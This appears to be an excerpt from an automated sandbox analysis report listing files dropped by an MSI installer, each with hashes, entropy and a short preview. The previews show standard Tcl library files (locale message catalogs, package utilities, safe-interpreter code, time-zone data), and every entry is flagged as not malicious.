                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \.. "Paz"\.. "Pzt"\.. "Sal"\.. "\u00c7ar"\.. "Per"\.. "Cum"\.. "Cmt"].. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \.. "Pazar"\.. "Pazartesi"\.. "Sal\u0131"\.. "\u00c7ar\u015famba"\.. "Per\u015fembe"\.. "Cuma"\.. "Cumartesi"].. ::msgcat::mcset tr MONTHS_ABBREV [list \.. "Oca"\.. "\u015eub"\.. "Mar"\.. "Nis"\.. "May"\.. "Haz"\.. "Tem"\.. "A\u011fu"\.. "Eyl"\.. "Eki"\.. "Kas"\.. "Ara"\.. ""].. ::msgcat::mcset tr MONTHS_FULL [list \.. "Ocak"\.. "\u015eubat"\.. "Mart"\.. "Nisan"\.. "May\u0131s"\.. "Haziran"\.. "Temmuz"\.. "A\u011fustos"\.. "Eyl\u00fcl"\.. "Ekim"\.. "Kas\u0131m"\.. "Aral\u
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2165
                                                                                                                                Entropy (8bit):4.289021158621493
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:436yILgoQjQPxUIkgPDRQnQ0vVQbC1iQwweIgWQDIoZI7QDI3QbI87IVQnIzQ7mh:2AzUe3EhV8CYgrbH7z3fLVTzgn5jyX7p
                                                                                                                                MD5:323BD95809A44B0BADC71AD36E5F095B
                                                                                                                                SHA1:44F6016873CA955D27545C56CCD24BDB06A83C43
                                                                                                                                SHA-256:7093DA7E39CEB6D3F51EB6CF1CCA2D7F3680ED7B8FE4A5F0CECEEF6BEB21AC77
                                                                                                                                SHA-512:DB16E0E2D17CE47673DE781A7171944C14CC550FB8EB0920C05B979E4D067E36DF0B59B8BFA81F82D8FCE1FFDDAAD2755E68BFE5BC0DBB11E8716A4D18BA5F7E
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0432\u0442"\.. "\u0441\u0440"\.. "\u0447\u0442"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0456\u043b\u044f"\.. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\.. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\.. "\u0441\u0435\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440"\.. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset uk MONTHS_ABBREV [list \.. "\u0441\u0456\u0447"\.. "\u043b\u044e\u0442"\.. "\u0431\u0435\u0440"\.. "\u043a\u0432\u0456\u0442"\.. "\u0442\u0440\u0430\u0432"\.. "\u0447\u0435\u0440\u0432"\.. "\u043b
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1471
                                                                                                                                Entropy (8bit):4.44729506678271
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:4aR836DNjYTP55YAUy2tJ9kyzW68IFYHMBSW1K1pvhv1O:43dbYJyC8ySgI1dV1O
                                                                                                                                MD5:C127F54C462917D3B3EEF5F29F612138
                                                                                                                                SHA1:B1D9A67F856D93F98524C6372B352EA0DE1B9CD3
                                                                                                                                SHA-256:E9B7AECD456F1D2288604C982B5DED0DCF71DCA968C0B0EAFF4CA16CC3B73EC2
                                                                                                                                SHA-512:0B0F132F10580751258D37E070338C3B39DF57FDECDB9D0AFA67E90D6766DDCB4D711876E551ED759D177F1B8F4E9E1DD8F7899F7CB57F8039F55EC4C2984E87
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \.. "Th 2"\.. "Th 3"\.. "Th 4"\.. "Th 5"\.. "Th 6"\.. "Th 7"\.. "CN"].. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \.. "Th\u01b0\u0301 hai"\.. "Th\u01b0\u0301 ba"\.. "Th\u01b0\u0301 t\u01b0"\.. "Th\u01b0\u0301 n\u0103m"\.. "Th\u01b0\u0301 s\u00e1u"\.. "Th\u01b0\u0301 ba\u0309y"\.. "Chu\u0309 nh\u00e2\u0323t"].. ::msgcat::mcset vi MONTHS_ABBREV [list \.. "Thg 1"\.. "Thg 2"\.. "Thg 3"\.. "Thg 4"\.. "Thg 5"\.. "Thg 6"\.. "Thg 7"\.. "Thg 8"\.. "Thg 9"\.. "Thg 10"\.. "Thg 11"\.. "Thg 12"\.. ""].. ::msgcat::mcset vi MONTHS_FULL [list \.. "Th\u00e1ng m\u00f4\u0323t"\.. "Th\u00e1ng hai"\.. "Th\u00e1ng ba"\.. "Th\u00e1ng t\u01b0"\.. "Th\u00e
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with very long lines (1598), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3385
                                                                                                                                Entropy (8bit):4.5164095151631125
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:43qrY2BBT7uxDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyke2gdr:2yPTKdo
                                                                                                                                MD5:2F356DE14D48B1091DEAA32D20C38D96
                                                                                                                                SHA1:4AB78D47A73290000955A7C1DFDF7106093F69FD
                                                                                                                                SHA-256:EB247F5184A59414D3DF7E3ECA51F5998C248CFB27D2C02E62A7A30AB35197A7
                                                                                                                                SHA-512:602410830018B455C68AE2EBDD83BA561CF59DA5898E00C80CE7EF619912E591EB38B4C8FE8D9B1F024E7105B0C4D2D326FC855F31E79C1B954429B947DFFBB1
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh MONTHS_ABBREV [list \.. "\u4e00\u6708"\.. "\u4e8c\u6708"\.. "\u4e09\u6708"\.. "\u56db\u6708"\.. "\u4e94\u6708"\.. "\u516d\u6708"\.. "\u4e03\u6708"\.. "\u516b\u6708"\.. "\u4e5d\u6708"\.. "\u5341\u6708"\.. "\u5341\u4e00\u6708"\.. "\u5341\u4e8c\u6708"\.. ""].. ::msgcat::m
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):319
                                                                                                                                Entropy (8bit):5.167825099880243
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SlSyEtJLl73oo6d3/xoX5YBoHJ+3vtfNrsoHJ+3v6MYBoXa+3vYq9vn:4EnLB383U5YMJ+3vtN3J+3v6LcL3vYqN
                                                                                                                                MD5:9FCDC2E80E13984D434E3CC91E1ED14C
                                                                                                                                SHA1:710D9EE2A71021F4AB609886138EED43C1380ACD
                                                                                                                                SHA-256:4C8A855700FEFE8EE21B08030FF4159D8011AE50353F063229C42DE6292475CF
                                                                                                                                SHA-512:D899A1F58DF1051BB2C2C4AC859C52A2D19B1593C37022A29439B37A8057ADC3941F3564E2E1D9CEB72AE123A4E12E24C3736343AA3A5EC8749AB5AEBBF65085
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e".. ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2".. ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z"..}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):780
                                                                                                                                Entropy (8bit):4.716025632367214
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:4EnLB383HmSBBHZovDh4ToC4qU3WwVW3v6P3v3WwSn:4aR83Hxo14u3Ww+viv3WwS
                                                                                                                                MD5:CFDA7B6463305FA15DBBA72D725A1876
                                                                                                                                SHA1:2BF885073FBAF4A38B7AFDA76CA391F195A5A362
                                                                                                                                SHA-256:7E1C5BD9EC1A17BB851B0DCABD0DFA9FF9D64B89603D9D3FBEAAC609172346AE
                                                                                                                                SHA-512:55F974C706933ECE0575A33C381D9B370B8A408C5C5514C805EC04C8B0CA5BAFAA47267DA98E1805B478A9589FFB7549D79002B2A7AF387049011D78DD7605B6
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u4e00"\.. "\u4e8c"\.. "\u4e09"\.. "\u56db"\.. "\u4e94"\.. "\u516d"].. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"\.. ""].. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5".. ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S".. ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z"..}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):347
                                                                                                                                Entropy (8bit):5.062880051437783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SlSyEtJLl73oo6d3/xoOpEoPpFocMohX3v6Zwoh+3v6fxvn:4EnLB383J53v6O3vCn
                                                                                                                                MD5:3218F8E6BEDD534277DE0849C423158E
                                                                                                                                SHA1:10C006446A10406A5644C4033665E877EBF72AF7
                                                                                                                                SHA-256:500546B3211D454659D845B4AB9AEF226125100DF40407C49530DE17CDD4363F
                                                                                                                                SHA-512:3142893DA85BA8F83A5B6851B313B5F5FF80D2B989C1AE015665EE70373249B44EFB4FF7C621F1D8F37AC6019EF5E8D6D21C76C48998C3D9072F9C5060AA8813
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_SG AM "\u4e0a\u5348".. ::msgcat::mcset zh_SG PM "\u4e2d\u5348".. ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y".. ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z"..}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):354
                                                                                                                                Entropy (8bit):5.124064818715749
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:SlSyEtJLl73oo6d3/xoAykaRULH/XRxy/5oAyjZRULHi5oAyU/G0OMoAyxW3v6ZQ:4EnLB38315xDOiKRRW3v6F3v8A2n
                                                                                                                                MD5:9010E34791B5DDB7F1E0AD4DA6BD4623
                                                                                                                                SHA1:418F7374BABEF27FEC8E00D3A32F535084593AB9
                                                                                                                                SHA-256:DBA0584B8E1925B439F06E0BF0965E97AFB7EB39E70E0E4C9B70769EBC5F996C
                                                                                                                                SHA-512:D3AB698B725E84DAB06E472C41FF2EB55D63885D22B4598C596800BAC83A02A44CB524524F267D090952AF7E0031F47720786ACF9E354EF672CF9EEFB7DB3BD4
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d".. ::msgcat::mcset zh_TW CE "\u6c11\u570b".. ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e".. ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z"..}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):33777
                                                                                                                                Entropy (8bit):4.60013086740989
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:4D0xrpIuhenN4kA0G6sRcl5AdtsPLKiF64aJQ2L:HpnhsS9C5Adqua5aJvL
                                                                                                                                MD5:4ECD97188BFED58A15FE22EC566FA6A3
                                                                                                                                SHA1:6E4E91096298F1A0AE6CD4241F167C8B4F661EE5
                                                                                                                                SHA-256:67A157F1873D606B53DC4D894BD8E71F6B1A0DD66177B9513BD039B348B40349
                                                                                                                                SHA-512:1D5067BBB13DAB001168EEB41EBFA2D13BACB0F43A8067CC93923E8F4D062AA387DA23D7D98D6A2AE77D7C849A6026F2343102CBE03690C2CEA0890222339475
                                                                                                                                Malicious:false
                                                                                                                                Preview:# optparse.tcl --..#..# (private) Option parsing package..# Primarily used internally by the safe:: code...#..#.WARNING: This code will go away in a future release..#.of Tcl. It is NOT supported and you should not rely..#.on it. If your code does rely on this package you..#.may directly incorporate this code into your application.....package require Tcl 8.5-..# When this version number changes, update the pkgIndex.tcl file..# and the install directory in the Makefiles...package provide opt 0.4.8....namespace eval ::tcl {.... # Exported APIs.. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \.. OptProc OptProcArgGiven OptParse \... Lempty Lget \.. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \.. SetMax SetMin......################# Example of use / 'user documentation' ###################.... proc OptCreateTestProc {} {.....# Defines ::tcl::OptParseTest as a test proc with parsed arguments...# (can't be d
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):620
                                                                                                                                Entropy (8bit):4.702477618616754
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:jHxIRu9zhjJS42wbGlTULuUAZb3KykszLYIGbyAkXaqrQ+pBb6:biRUJS42wbGlTUcZ+yk2LY0XaqrB4
                                                                                                                                MD5:07532085501876DCC6882567E014944C
                                                                                                                                SHA1:6BC7A122429373EB8F039B413AD81C408A96CB80
                                                                                                                                SHA-256:6A4ABD2C519A745325C26FB23BE7BBF95252D653A24806EB37FD4AA6A6479AFE
                                                                                                                                SHA-512:0D604E862F3A1A19833EAD99AAF15A9F142178029AB64C71D193CEE4901A0196C1EEDDC2BCE715B7FA958AC45C194E63C77A71E4BE4F9AEDFD5B44CF2A726E76
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Tcl package index file, version 1.1..# This file is generated by the "pkg_mkIndex -direct" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....if {![package vsatisfies [package provide Tcl] 8.5-]} {return}..package ifneeded opt 0.4.8 [list source [file join $dir optparse.tcl]]..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23995
                                                                                                                                Entropy (8bit):4.884828325514459
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:8xgjLNILEHsdAW2UfnImRqXqux6XmihmCchzPLrXJjJh6PLfzdklG:8xgjLNImsdnvIm86uGLhLchzDzJ9h6Dn
                                                                                                                                MD5:DDB0AB9842B64114138A8C83C4322027
                                                                                                                                SHA1:ECCACDC2CCD86A452B21F3CF0933FD41125DE790
                                                                                                                                SHA-256:F46AB61CDEBE3AA45FA7E61A48930D64A0D0E7E94D04D6BF244F48C36CAFE948
                                                                                                                                SHA-512:C0CF718258B4D59675C088551060B34CE2BC8638958722583AC2313DC354223BFEF793B02F1316E522A14C7BA9BED219531D505DE94DC3C417FC99D216A01463
                                                                                                                                Malicious:false
                                                                                                                                Preview:# package.tcl --..#..# utility procs formerly in init.tcl which can be loaded on demand..# for package management...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval tcl::Pkg {}....# ::tcl::Pkg::CompareExtension --..#..# Used internally by pkg_mkIndex to compare the extension of a file to a given..# extension. On Windows, it uses a case-insensitive comparison because the..# file system can be file insensitive...#..# Arguments:..# fileName.name of a file whose extension is compared..# ext..(optional) The extension to compare against; you must..#..provide the starting dot...#..Defaults to [info sharedlibextension]..#..# Results:..# Returns 1 if the extension matches, 0 otherwise....proc tcl::Pkg::CompareExtension {fileName {ext {}}} {.. global tcl_platfor
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):844
                                                                                                                                Entropy (8bit):4.883013702569192
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TF7S2n2wn2SNHaeYF9xcwrmXhbs1GUiSYX3EtSK78ex4VIpynEw88/McUBbPgnz:TF7Hn2wnlk2KwyZSM4SkV/3UB7Cz
                                                                                                                                MD5:577787C2F4F5956BA70F83012B980AE5
                                                                                                                                SHA1:040B2469F796F3FDFCD1E1DD2EB1C5B799EDEF62
                                                                                                                                SHA-256:E269029C8263E3CBC1920C3604ECDCF15EDCCB208A0D68F9EB42B73954D620C0
                                                                                                                                SHA-512:C2940F6F3D77412EFC537B8AB67352F519DFFA95739FCC17BF1817335AFD9E5BFE91ABE98CBA99E278CB4923D4E6D431ED9D72282745203C0F7D73193F550238
                                                                                                                                Malicious:false
                                                                                                                                Preview:# parray:..# Print the contents of a global array on stdout...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc parray {a {pattern *}} {.. upvar 1 $a array.. if {![array exists array]} {...return -code error "\"$a\" isn't an array".. }.. set maxl 0.. set names [lsort [array names array $pattern]].. foreach name $names {...if {[string length $name] > $maxl} {... set maxl [string length $name]...}.. }.. set maxl [expr {$maxl + [string length $a] + 2}].. foreach name $names {...set nameString [format %s(%s) $a $name]...puts stdout [format "%-*s = %s" $maxl $nameString $array($name)].. }..}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):42223
                                                                                                                                Entropy (8bit):4.822635446297551
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:H/Jo8y7AyARYhZfc3njlVdRIp4xOtoYx4WneNiBq5vIhfwEaqadlUCJ2Pbb1P6:H/c7AmhZmnjvdRIG924WneNiBq5+fwEc
                                                                                                                                MD5:B8C1561D471CFBF4111C706411D59883
                                                                                                                                SHA1:71483EAEEF377EE9AF90BEC44F70C7B12C5BC720
                                                                                                                                SHA-256:C21DCE3AB31893118BBED01E559070F1D3541877FEE331BD45F5BF4300ED9654
                                                                                                                                SHA-512:465065A938C71AF4588B3331B51A62DD57F57492EB1CB6C0F52B9FD0A2FE7A54B1E995AA56E4A41D7A99EAFF665C1E23E3B240FB3F9840AB242C21B1DBFFFF45
                                                                                                                                Malicious:false
                                                                                                                                Preview:# safe.tcl --..#..# This file provide a safe loading/sourcing mechanism for safe interpreters...# It implements a virtual path mechanism to hide the real pathnames from the..# child. It runs in a parent interpreter and sets up data structure and..# aliases that will be invoked when used from a child interpreter...#..# See the safe.n man page for details...#..# Copyright (c) 1996-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....#..# The implementation is based on namespaces. These naming conventions are..# followed:..# Private procs starts with uppercase...# Public procs are exported and starts with lowercase..#....# Needed utilities package..package require opt 0.4.8....# Create the safe namespace..namespace eval ::safe {.. # Exported API:.. namespace export interpCreate interpInit interpConfigure interpDelete \...interpAddToAccessPath interpFindInAccessPath setL
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5617
                                                                                                                                Entropy (8bit):4.747404679682368
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:eOaVhNUMUuUQU2UsUIUbUEUEeUkgU6UWSO0DT5RTdcvsilrvs+jscMK57ehXowrz:ejVHRRLP3LWDXewTbSO0DT5RTdcvsilg
                                                                                                                                MD5:C62FB22F4C9A3EFF286C18421397AAF4
                                                                                                                                SHA1:4A49B8768CFF68F2EFFAF21264343B7C632A51B2
                                                                                                                                SHA-256:DDF7E42DEF37888AD0A564AA4F8CA95F4EEC942CEBEBFCA851D35515104D5C89
                                                                                                                                SHA-512:558D401CB6AF8CE3641AF55CAEBC9C5005AB843EE84F60C6D55AFBBC7F7129DA9C58C2F55C887C3159107546FA6BC13FFC4CCA63EA8841D7160B8AA99161A185
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Tcl autoload index file, version 2.0..# -*- tcl -*-..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(auto_reset) [list source [file join $dir auto.tcl]]..set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.t
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12204
                                                                                                                                Entropy (8bit):4.763796758810551
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:55CjnlRfMKqaOH5bE2KjNkkpgpCmqkkuowUh9PTYMsvSO+xy8h/vuKisM68E:5q3MKYH5bE1jNkkpgomq/uCPTYMC+k83
                                                                                                                                MD5:215262A286E7F0A14F22DB1AA7875F05
                                                                                                                                SHA1:66B942BA6D3120EF8D5840FCDEB06242A47491FF
                                                                                                                                SHA-256:4B7ED9FD2363D6876092DB3F720CBDDF97E72B86B519403539BA96E1C815ED8F
                                                                                                                                SHA-512:6ECD745D7DA9D826240C0AB59023C703C94B158AE48C1410FAA961A8EDB512976A4F15AE8DEF099B58719ADF0D2A9C37E6F29F54D39C1AB7EE81FA333A60F39B
                                                                                                                                Malicious:false
                                                                                                                                Preview:# -*- tcl -*-..#..# Searching for Tcl Modules. Defines a procedure, declares it as the primary..# command for finding packages, however also uses the former 'package unknown'..# command as a fallback...#..# Locates all possible packages in a directory via a less restricted glob. The..# targeted directory is derived from the name of the requested package, i.e...# the TM scan will look only at directories which can contain the requested..# package. It will register all packages it found in the directory so that..# future requests have a higher chance of being fulfilled by the ifneeded..# database without having to come to us again...#..# We do not remember where we have been and simply rescan targeted directories..# when invoked again. The reasoning is this:..#..# - The only way we get back to the same directory is if someone is trying to..# [package require] something that wasn't there on the first scan...#..# Either..# 1) It is there now: If we rescan, you get it; if not you don
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):147
                                                                                                                                Entropy (8bit):4.995501022397479
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QF08x/2DcsBdNMXGm2OHnFvpsYoHsdSalHFLwy:SlSWB9eg/2DBpDm2OHnFvmYoH1alHOy
                                                                                                                                MD5:FF8B5540631A6EE93507338C4E7AA49D
                                                                                                                                SHA1:817B261A1B6B92AA498EC286349964EA10FB5A84
                                                                                                                                SHA-256:7213997BB9CF9D384A7002B8C8EFEF25C01ABA6083D9835A16D583D5DCEE40A0
                                                                                                                                SHA-512:8D78AC4868ED0013EDA536C0E82E0E91398772AA18C637AEFE22F24B142FCDA55A4CB853B2282951E907C9E2F62BD3F831A5CF995F52898F5225D16889943A9C
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Abidjan) {.. {-9223372036854775808 -968 0 LMT}.. {-1830383032 0 0 GMT}..}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):183
                                                                                                                                Entropy (8bit):4.832432925672155
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dc9XfBQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DUGDBS
                                                                                                                                MD5:52FDFD3DB98475FBBB620D0D5565C5CC
                                                                                                                                SHA1:C7750452859663605272553DBEE0B6C134E1517C
                                                                                                                                SHA-256:6040827AFED8CEF45F252FBD7E3E862C0B5E9D06C1C98C58BAD61DFE67BD57CC
                                                                                                                                SHA-512:2FF9D96D81279148A86BE208FEEACCBCB8B4224D093D6C092ECD1C4EA2186589CCF947027D3A726600C703611B4CFEE029AA14ED3E8593C477B427C4F342CF27
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Accra) $TZData(:Africa/Abidjan)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):189
                                                                                                                                Entropy (8bit):4.817170256300069
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DczqIVDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DnaDkO
                                                                                                                                MD5:30CDD4D37E9DD60FBF6D754C9343F364
                                                                                                                                SHA1:56F896C21068764B7B8F884F374B18913CA3D9CA
                                                                                                                                SHA-256:E11FD8AD8572B684333810CFDC23B92E1ACF619875866985E288D92F8277D07F
                                                                                                                                SHA-512:78FC8043CCE25713404E70996229E5EA8238BF5C0F59029064EDA5494E2D4F54398931F3D855E30C82B2C53B789C40EE4CBF09D0F98C2BA6734595D4AA75017A
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Addis_Ababa) $TZData(:Africa/Nairobi)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1080
                                                                                                                                Entropy (8bit):4.187497782275587
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:MB862D7nmdHh5Cv6/lHY8SOSuvvzXipFSgSO5vW5aKmvbsF6VWsXN87QBWcAFy:5veSvKlHYXNujXipFSjKRKXiWsXCGWJy
                                                                                                                                MD5:E8D3DF11CE0E7575485573FA07D955D5
                                                                                                                                SHA1:3B2C00C85B6C0BFAA1C676C970D6DF1B4BDC3D4A
                                                                                                                                SHA-256:E6874647561CE1C5FD1F650C9B167F77AC5B24FD2026046399A9043CF998E5C4
                                                                                                                                SHA-512:E2968BE847622CF243C0E498436FD21BDC2E1DF0FD8D694F2C70569D17CE896CDE4968BB8ABDEF9F687439E4EA2D955AE87D6C15E81F881EE1413416A90765D4
                                                                                                                                Malicious:false
